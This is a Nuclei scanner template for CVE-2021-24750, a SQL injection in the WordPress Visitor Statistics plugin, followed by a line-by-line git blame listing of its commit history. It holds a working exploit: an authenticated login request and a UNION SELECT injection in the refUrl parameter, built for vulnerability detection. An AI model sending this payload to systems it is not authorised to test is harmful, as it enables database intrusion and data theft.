nuclei-templates/http/cves/2021/CVE-2021-24750.yaml

id: CVE-2021-24750

info:
  name: WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection
  author: cckuakilong
  severity: high
  description: WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
  remediation: |
    Update to the latest version of the WordPress Visitor Statistics (Real Time Traffic) plugin (version 4.8 or higher) to mitigate the SQL Injection vulnerability.
  reference:
    - https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
    - https://wpscan.com/vulnerability/7528aded-b8c9-4833-89d6-9cd7df3620de
    - https://plugins.trac.wordpress.org/changeset/2622268
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24750
    - https://github.com/WhooAmii/POC_to_review
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-24750
    cwe-id: CWE-89
    epss-score: 0.02059
    epss-percentile: 0.88991
    cpe: cpe:2.3:a:wp_visitor_statistics_\(real_time_traffic\)_project:wp_visitor_statistics_\(real_time_traffic\):*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: wp_visitor_statistics_\(real_time_traffic\)_project
    product: wp_visitor_statistics_\(real_time_traffic\)
    framework: wordpress
  tags: cve2021,cve,authenticated,wpscan,sqli,wp,wordpress,wp-plugin,wp_visitor_statistics_\(real_time_traffic\)_project
variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022066f963610956751aad95f5b686b34695f912af8f37326c25b6fec6f8db31d602022100d6ba059cd38cb02845d4f79da8521497306aca3671c3231f9b17d54f08b1c05f:922c64590222798bb761d5b6d8e72950
add CVE-2021-24750 2022-01-23 05:17:20 +00:00			`id: CVE-2021-24750`

			`info:`
Dashboard Content Enhancements (#4665) * Enhancement: cves/2021/CVE-2021-24750.yaml by mp * Enhancement: cves/2021/CVE-2021-24340.yaml by mp * Enhancement: cves/2021/CVE-2021-24278.yaml by mp * Enhancement: cves/2021/CVE-2021-24226.yaml by mp * Enhancement: cves/2021/CVE-2021-24146.yaml by mp * Remove link to opencve.io in favor of NVD * Minor cleanups and added cve-id to CVE-2022-1904.yaml Co-authored-by: sullo <sullo@cirt.net> 2022-06-25 07:14:58 +00:00			`name: WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection`
add CVE-2021-24750 2022-01-23 05:17:20 +00:00			`author: cckuakilong`
			`severity: high`
Dashboard Content Enhancements (#4665) * Enhancement: cves/2021/CVE-2021-24750.yaml by mp * Enhancement: cves/2021/CVE-2021-24340.yaml by mp * Enhancement: cves/2021/CVE-2021-24278.yaml by mp * Enhancement: cves/2021/CVE-2021-24226.yaml by mp * Enhancement: cves/2021/CVE-2021-24146.yaml by mp * Remove link to opencve.io in favor of NVD * Minor cleanups and added cve-id to CVE-2022-1904.yaml Co-authored-by: sullo <sullo@cirt.net> 2022-06-25 07:14:58 +00:00			`description: WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: \|`
			`Update to the latest version of the WordPress Visitor Statistics (Real Time Traffic) plugin (version 4.8 or higher) to mitigate the SQL Injection vulnerability.`
add CVE-2021-24750 2022-01-23 05:17:20 +00:00			`reference:`
			`- https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://wpscan.com/vulnerability/7528aded-b8c9-4833-89d6-9cd7df3620de`
			`- https://plugins.trac.wordpress.org/changeset/2622268`
Dashboard Content Enhancements (#4665) * Enhancement: cves/2021/CVE-2021-24750.yaml by mp * Enhancement: cves/2021/CVE-2021-24340.yaml by mp * Enhancement: cves/2021/CVE-2021-24278.yaml by mp * Enhancement: cves/2021/CVE-2021-24226.yaml by mp * Enhancement: cves/2021/CVE-2021-24146.yaml by mp * Remove link to opencve.io in favor of NVD * Minor cleanups and added cve-id to CVE-2022-1904.yaml Co-authored-by: sullo <sullo@cirt.net> 2022-06-25 07:14:58 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2021-24750`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`- https://github.com/WhooAmii/POC_to_review`
add CVE-2021-24750 2022-01-23 05:17:20 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 8.8`
			`cve-id: CVE-2021-24750`
			`cwe-id: CWE-89`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.02059`
			`epss-percentile: 0.88991`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:a:wp_visitor_statistics_\(real_time_traffic\)_project:wp_visitor_statistics_\(real_time_traffic\)::::::wordpress::*`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: wp_visitor_statistics_\(real_time_traffic\)_project`
			`product: wp_visitor_statistics_\(real_time_traffic\)`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`framework: wordpress`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2021,cve,authenticated,wpscan,sqli,wp,wordpress,wp-plugin,wp_visitor_statistics_\(real_time_traffic\)_project`
Update CVE-2021-24750.yaml 2022-06-30 03:50:00 +00:00			`variables:`
			`num: "999999999"`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
add CVE-2021-24750 2022-01-23 05:17:20 +00:00			`- raw:`
			`- \|`
			`POST /wp-login.php HTTP/1.1`
			`Host: {{Hostname}}`
Update CVE-2021-24750.yaml 2022-01-23 09:21:25 +00:00			`Origin: {{RootURL}}`
add CVE-2021-24750 2022-01-23 05:17:20 +00:00			`Content-Type: application/x-www-form-urlencoded`
			`Cookie: wordpress_test_cookie=WP%20Cookie%20check`

			`log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1`
			`- \|`
Update CVE-2021-24750.yaml 2022-06-30 03:50:00 +00:00			`GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1`
add CVE-2021-24750 2022-01-23 05:17:20 +00:00			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
Update CVE-2021-24750.yaml 2022-06-30 03:50:00 +00:00			`- '{{md5({{num}})}}'`
add CVE-2021-24750 2022-01-23 05:17:20 +00:00
			`- type: status`
			`status:`
Update CVE-2021-24750.yaml 2022-01-23 09:08:12 +00:00			`- 200`
Auto Template Signing [Sat Jun 1 06:52:59 UTC 2024] :robot: 2024-06-01 06:53:00 +00:00			`# digest: 4a0a00473045022066f963610956751aad95f5b686b34695f912af8f37326c25b6fec6f8db31d602022100d6ba059cd38cb02845d4f79da8521497306aca3671c3231f9b17d54f08b1c05f:922c64590222798bb761d5b6d8e72950`